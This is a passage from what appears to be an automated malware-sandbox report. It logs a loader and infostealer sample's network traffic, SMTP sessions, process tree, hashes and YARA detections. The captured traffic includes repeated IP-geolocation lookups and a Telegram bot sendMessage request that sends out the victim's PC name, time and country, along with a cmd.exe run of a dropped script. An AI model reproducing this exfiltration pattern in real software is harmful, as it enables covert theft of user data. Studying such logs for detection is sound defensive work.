2025-01-06 06:58:28 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49785	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:29 UTC	871	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461498 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bj3C9iUXcRDuJX2Ynixl%2BFDdS70N%2Fh1%2B5Bj1tGWlIYW%2BDHplkdyfSuWciULAUgsS0zYgtKWqh8HMmpwpfjv9ojudrW8HJDMud%2FV7i6ZtoS1I6B%2FjCxrcM%2FYDfn%2FOht5ZRZ1pcE%2F%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1e61a74c463-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1478&rtt_var=558&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1951871&cwnd=162&unsent_bytes=0&cid=e7ace41e0bcbdca7&ts=147&x=0"
2025-01-06 06:58:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49787	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:30 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461499 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVV4KKv00P%2F7DQYtZxs7euAJggcNoHHlF%2BRGi%2F0nPWh2zGwOsinFfEgUEBWWnha1ykuVrztpgB5TlVG3nwAKr88lsO2Yhi84GbPBn8ZCnGwy%2Bna8VwygZZeRRJcOr%2BcIoo745ees"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1ee390c4252-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1727&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1619523&cwnd=235&unsent_bytes=0&cid=d1f1e87808555aea&ts=153&x=0"
2025-01-06 06:58:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49789	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:32 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461501 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOaNt88lqpQFKNiyjuMhRdCRrJTogYa1OvYqtYsbIclS9gNSh3%2F9oWnoooLbhfzKgzz%2Fk%2FaauEhkJ7pALZAS3lk3Zs0%2B4R0xwaCjVXmYZOZjBssI7e2Str0%2BlSLB5liNn2JDpAuE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1f66d5441a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1760&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1600000&cwnd=209&unsent_bytes=0&cid=34e780fb0c344662&ts=146&x=0"
2025-01-06 06:58:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49791	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:33 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461502 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CsmEguUgc9gacKSWwe3Zh1X%2F9Iik0vEaw1f1iOSv8ItNBWpt8sRZs89rVHiPirdOavFmTpywKGy30LzFFrqbivZpNZR4F0rUxByltHZWkPDBTCGXTy9F7WIZatMyXQDeTHpbbw%2B1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1ff4a224345-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1566&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1717647&cwnd=219&unsent_bytes=0&cid=93887b61fd8e1b40&ts=132&x=0"
2025-01-06 06:58:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49793	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:34 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461503 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bscnxgsT0nTllq49rSm3TRINq2lPyBtx5EIgmTLPGpq%2F8wWnbr5Ya1ByA6LDGkPUWbuIPSFRE%2B7iyW7SqhwvO6z17qWwR5yICbtHuQoos%2B47hBZDlrugQL294XGz7Skh4dLUJDRE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d2078cb1c440-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1951871&cwnd=245&unsent_bytes=0&cid=f2818e3a18943124&ts=145&x=0"
2025-01-06 06:58:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49794	149.154.167.220	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:35 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:23:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-06 06:58:35 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:58:35 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:58:35 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 6, 2025 07:58:24.308244944 CET	587	49770	208.91.198.176	192.168.2.4	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:58:24
Jan 6, 2025 07:58:24.311194897 CET	49770	587	192.168.2.4	208.91.198.176	EHLO 610930
Jan 6, 2025 07:58:24.458218098 CET	587	49770	208.91.198.176	192.168.2.4	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 6, 2025 07:58:24.460542917 CET	49770	587	192.168.2.4	208.91.198.176	STARTTLS
Jan 6, 2025 07:58:24.615736961 CET	587	49770	208.91.198.176	192.168.2.4	220 Ready to start TLS
Jan 6, 2025 07:58:35.527370930 CET	587	49795	208.91.198.176	192.168.2.4	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:58:35
Jan 6, 2025 07:58:35.527565002 CET	49795	587	192.168.2.4	208.91.198.176	EHLO 610930
Jan 6, 2025 07:58:35.678175926 CET	587	49795	208.91.198.176	192.168.2.4	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 6, 2025 07:58:35.678339958 CET	49795	587	192.168.2.4	208.91.198.176	STARTTLS
Jan 6, 2025 07:58:35.838881969 CET	587	49795	208.91.198.176	192.168.2.4	220 Ready to start TLS
Jan 6, 2025 07:58:42.583708048 CET	587	49796	208.91.198.176	192.168.2.4	220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:58:42
Jan 6, 2025 07:58:42.583884954 CET	49796	587	192.168.2.4	208.91.198.176	EHLO 610930
Jan 6, 2025 07:58:42.730185032 CET	587	49796	208.91.198.176	192.168.2.4	250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions 250-AUTH NTLM CRAM-MD5 LOGIN 250-SIZE 31457280 250-HELP 250-AUTH=LOGIN 250 STARTTLS
Jan 6, 2025 07:58:42.730417967 CET	49796	587	192.168.2.4	208.91.198.176	STARTTLS
Jan 6, 2025 07:58:42.885763884 CET	587	49796	208.91.198.176	192.168.2.4	220 Ready to start TLS

Target ID:	0
Start time:	01:57:55
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\yxU3AgeVTi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yxU3AgeVTi.exe"
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	6047499517804F1EA76B508CA469DE99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1709607679.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1688698049.0000000002286000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:57:58
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:57:58
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:57:58
Start date:	06/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4109204899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000003.00000002.4109204899.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000003.00000001.1687216190.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4136903739.0000000025421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:58:09
Start date:	06/01/2025
Path:	C:\Users\Public\Libraries\Aiymwhpj.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Aiymwhpj.PIF"
Imagebase:	0x400000
File size:	1'161'216 bytes
MD5 hash:	6047499517804F1EA76B508CA469DE99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:58:10
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 6804, Parent PID: 6740

General

Target ID:	6
Start time:	01:58:10
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:58:10
Start date:	06/01/2025
Path:	C:\Users\Public\Libraries\jphwmyiA.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\jphwmyiA.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
